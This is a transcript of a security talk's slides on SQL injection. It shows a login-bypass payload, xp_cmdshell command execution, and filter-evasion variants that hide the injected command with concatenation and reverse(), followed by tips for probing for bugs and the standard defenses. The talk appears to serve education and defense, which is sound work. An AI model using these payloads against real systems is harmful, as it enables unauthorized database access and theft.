how did i steal your database
DESCRIPTION
How Did I Steal Your Database. Mostafa Siraj. @mostafasiraj. Agenda. Noooo, it kills suspense. DISCLAIMER. Hacking websites is ILLEGAL This presentation is meant for educational purposes ONLY Only use this stuff on YOUR website and YOUR account. SQL Injection. What is it? - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/1.jpg)
How Did I Steal Your DatabaseMostafa Siraj
@mostafasiraj
![Page 2: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/2.jpg)
Agenda
Noooo, it kills suspense
![Page 3: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/3.jpg)
DISCLAIMERHacking websites is ILLEGALThis presentation is meant for educational purposes ONLYOnly use this stuff on YOUR website and YOUR account
![Page 4: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/4.jpg)
What is it?The application dynamically
generates an SQL query based on user input, but it does not sufficiently prevent that input from modifying the intended structure of the query.
SQL Injection
![Page 5: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/5.jpg)
SQL Injection Example, Bypassing Logon
• Original SQL QueryString sqlQuery = "SELECT * FROM user WHERE name = '" + username +"' AND
pass='" + password + "'“…..• Setting username to Mostafa & password to ' OR '1'= '1 producesSELECT * FROM user WHERE name = 'Mostafa' AND pass='' OR '1'='1'• Attacker is logged on without Authentication
![Page 6: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/6.jpg)
Not only your web app and DB are at risk• Depending on the DB, an attacker can access the operating system• MS SQL Server: Execute OS command xp_cmdshell• Set username to '; exec master.dbo.xp_cmdshell "dir";-- producesSELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; --
Note: dir list directory content
![Page 7: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/7.jpg)
Let's play Hide and Seek
Original: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; --Defender: Disallow double quotes:
Attacker: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell dir; --
Defender: Filter out string “xp_cmdshell”Attacker: ';declare @a varchar(1000);set @a = 'master.dbo.xp_' + 'cmdshell dir';exec (@a);--
Defender: Filter out “xp”, “cmd”, “shell”, ….Attacker: ';declare @a varchar(1000);set @a = reverse('rid llehsdmc_px.obd.retsam');exec (@a);--
![Page 8: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/8.jpg)
Finding SQL Injection Bugs
![Page 9: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/9.jpg)
Finding SQL Injection Bugs
• Submit single quotation mark and observe the result• Submit two single quotation and observe the result• Identify the database (e.g.
Oracle: ‘||’FOOMS-SQL: ‘+’FOOMySQL: ‘ ‘FOO [note the space btw the 2 quotes]
![Page 10: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/10.jpg)
Finding SQL Injection Bugs
• For multistate processes, complete all the states before observing the results• For search fields try using the wildcard character %
![Page 11: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/11.jpg)
Finding SQL Injection Bugs
• For numeric data, if the original value was 2 try submitting
1+1 or 3-1• If successful try using SQL-specific keywords, e.g.
67-ASCII(‘A’)• If single quotes are filtered try
51-ASCII(1) [note ASCII(1)=49]
![Page 12: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/12.jpg)
Inject into different statement types
• You can do the same for all SQL statements (INSERT, UPDATE or DELETE)• Watch out when injecting in UPDATE or DELETE
![Page 13: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/13.jpg)
Demo
WebGoat
![Page 14: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/14.jpg)
Demo
HacmeBank
![Page 15: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/15.jpg)
Demo
Using UNION Operator
![Page 16: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/16.jpg)
Demo
MS-SQL Error
![Page 17: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/17.jpg)
Solution• Validate the input -accept only known good-• Process SQL queries using prepared statements, parameterized queries, or stored procedures. • Enforce least privilege• Avoid detailed error messages• Show care when using stored procedures (e.g. exec)
![Page 18: How Did I Steal Your Database](https://reader038.vdocuments.mx/reader038/viewer/2022110404/56812d03550346895d91da42/html5/thumbnails/18.jpg)
Thank You@mostafasiraj